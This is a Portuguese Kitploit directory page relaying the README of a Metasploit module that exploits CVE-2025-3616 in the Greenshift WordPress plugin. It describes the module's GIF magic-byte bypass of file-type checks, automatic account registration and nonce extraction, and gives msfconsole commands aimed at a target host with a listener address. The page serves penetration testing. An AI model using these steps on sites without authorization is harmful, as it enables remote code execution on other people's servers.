Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2025-3616 — Módulo Metasploit que explora upload arbitrário de arquivos no plugin Greenshift WordPress (CVE-2025-3616) para alcançar RCE via falsificação de MIME, com auto-registro e extração de nonce. | Kitploit
Ferramentas/GitHubGitHub/b4d-53ct0r/cve-2025-3616
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoDesenvolvimento de Payloads
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Módulo Metasploit que explora upload arbitrário de arquivos no plugin Greenshift WordPress (CVE-2025-3616) para alcançar RCE via falsificação de MIME, com auto-registro e extração de nonce.

Ver Repositório
2há 7 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Módulo Metasploit: Upload Arbitrário de Arquivo no Plugin WordPress Greenshift (CVE-2025-3616)

Este repositório contém um módulo Metasploit para explorar CVE-2025-3616, uma vulnerabilidade de upload arbitrário de arquivo no plugin WordPress Greenshift (versões 11.4 a 11.4.5).

O exploit permite que usuários autenticados (Assinante+) façam upload de arquivos arbitrários, levando à Execução Remota de Código (RCE). Ele contorna a validação de tipo de arquivo do plugin falsificando o tipo MIME usando bytes mágicos GIF (GIF89a;).

Recursos

  • Manipulação de Autenticação: Suporta login com credenciais existentes (USERNAME/PASSWORD).
  • Auto-Registro: Inclui uma opção REGISTER para registrar automaticamente um novo usuário e explorar a vulnerabilidade usando os novos cookies de sessão (útil se o registro estiver ativado no alvo).
  • Extração de Nonce: Extrai automaticamente o nonce wp_rest necessário do painel administrativo.
  • Contorno de Segurança: Adiciona bytes mágicos GIF ao payload PHP para contornar a verificação finfo_file().
  • Instalação

    1. Certifique-se de ter o Metasploit Framework instalado.

    2. Copie wp_greenshift_file_upload.rb para o diretório local de módulos:

      root@kitploit:~
      mkdir -p ~/.msf4/modules/exploits/unix/webapp/
      cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
      
    3. Inicie msfconsole e recarregue os módulos:

      root@kitploit:~
      msfconsole
      msf6 > reload_all
      

    Uso

    1. Usando Auto-Registro (Recomendado)

    Se o registro de usuário estiver ativado no alvo, você não precisa de credenciais.

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER true
    run
    

    2. Usando Credenciais Existentes

    Se você já possui um usuário válido (Assinante ou superior):

    root@kitploit:~
    use exploit/unix/webapp/wp_greenshift_file_upload
    set RHOSTS <TARGET_IP>
    set LHOST <YOUR_IP>
    set REGISTER false
    set USERNAME <USER>
    set PASSWORD <PASS>
    run
    

    Opções

    OpçãoObrigatórioDescrição
    RHOSTSsimO endereço do alvo
    LHOSTsimO endereço de escuta (seu IP)
    REGISTERnãoDefina como true para registrar uma nova conta automaticamente (Padrão: false)
    USERNAMEnãoNome de usuário do WordPress (obrigatório se REGISTER for false)
    PASSWORDnãoSenha do WordPress (obrigatório se REGISTER for false)
    EMAILnãoEmail para registro (opcional, gerado automaticamente se vazio)

    Aviso Legal

    Este módulo é apenas para fins educacionais e testes de penetração autorizados. O uso deste código para atacar alvos sem consentimento mútuo prévio é ilegal.

    Baixar ferramenta